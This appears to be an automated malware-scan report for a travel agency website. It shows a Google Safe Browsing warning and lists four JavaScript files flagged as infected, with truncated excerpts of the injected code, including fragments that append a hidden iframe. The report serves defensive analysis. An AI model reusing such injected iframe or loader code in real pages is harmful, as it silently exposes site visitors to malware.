Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=raytreacytravel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.raytreacytravel.com/ | 200 OK Content-Length: 25986 Content-Type: text/html | clean |
http://www.raytreacytravel.com/media/system/js/caption.js | 200 OK Content-Length: 9162 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = if(f)e(s);} Antivirus reports:
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/cmenu.js | 200 OK Content-Length: 23745 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function CMenu(aa){if(typeof aa.iname!='string'){alert('CMenu initialization error: Instance name is missing');return;} this.iname=aa.iname;var ba=navigator.userAgent.toLowerCase().match(/msie (\d(.\d*)?)/);var ca=ba&&ba[1]&&ba[1]<7;this.hide_timeout=typeof aa.hide_timeout!='number'?500:aa.hide_timeout;this.mi_layers=typeof aa.mi_layers!='number'?1:aa.mi_layers;if(this.mi_layers<1)this.mi_layers=1;this.mi_empty_normal_class=typeof aa.mi_empty_normal_class!='string'?'':a if(f)e(s);} Antivirus reports:
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/template.js | 200 OK Content-Length: 14425 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addEvent(obj, event, func) { if (obj.addEventListener) obj.addEventListener(event, func, false); else if (obj.attachEvent) obj.attachEvent('on' + event, func); } function travelin_get_wdg(wdg_center) { return { left: wdg_center.previousSibling.nodeType == 1 ? wdg_center.previousSibling : wdg_center.previousSibling.previousSibling, center: wdg_center, right: wdg_center.nextSibling.nodeType == 1 ? wdg_center.nextSibling : wdg_ce if(f)e(s);} Decoded script: function travelin_h_scroll() { if (document.travelinSearch) { document.travelinSearch.set_position(); } if (document.travelinTabs) { document.travelinTabs.set_position(); } } function travelin_h_resize() { var w = 0, h = 0; if (window.innerWidth) { w = window.innerWidth; h = window.innerHeight; } else if (document.documentElement && document.documentElement.clientWidth) {< ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/ddpanel.js | 200 OK Content-Length: 12131 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function DDPanel(aa){var ba=document.getElementById(aa.source_id);if(!ba)return;this.iname=aa.iname;this.offset_wdg=document.getElementById(aa.offset_id);this.offset_tag_x=aa.offset_tag_x;this.offset_tag_align=aa.offset_tag_align;this.offset_cnt_x=aa.offset_cnt_x;this.offset_cnt_align=aa.offset_cnt_align;this.offset_y=aa.offset_y;this.speed=aa.speed;this.interval=aa.interval;this.state=0;this.timer=0;this.progress=0;this.y_start=0;var ca=null,src_cnt_node=null;ba=ba?ba.firstChild:null;while(ba){ Antivirus reports:
| ||
http://www.raytreacytravel.com/modules/mod_tabmods/scripts/mod_tabmods.js | 200 OK Content-Length: 2082 Content-Type: application/x-javascript | clean |
http://www.raytreacytravel.com/index.php?view=article&id=1:home&format=pdf | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.raytreacytravel.com/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?view=article&id=1:home&tmpl=component&print=1&layout=default&page= | 200 OK Content-Length: 2822 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3d3dy5yYXl0cmVhY3l0cmF2ZWwuY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTE6aG9tZQ== | 200 OK Content-Length: 2788 Content-Type: text/html | clean |
http://www.raytreacytravel.com/images/RTTBookingform.pdf | 200 OK Content-Length: 300480 Content-Type: application/pdf | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&view=category&catid=1&Itemid=2 | 200 OK Content-Length: 19739 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&view=contact&id=1%3Aray-treacy-travel&catid=1%3Aray-treacy-travel&Itemid=2 | 200 OK Content-Length: 21045 Content-Type: text/html | clean |
http://www.raytreacytravel.com/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&task=vcard&contact_id=1&format=raw&tmpl=component | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: raytreacytravel.com
Result:
GET / HTTP/1.1
Host: raytreacytravel.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: raytreacytravel.com
Referer: http://www.google.com/search?q=raytreacytravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: raytreacytravel.com
Referer: http://www.google.com/search?q=raytreacytravel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.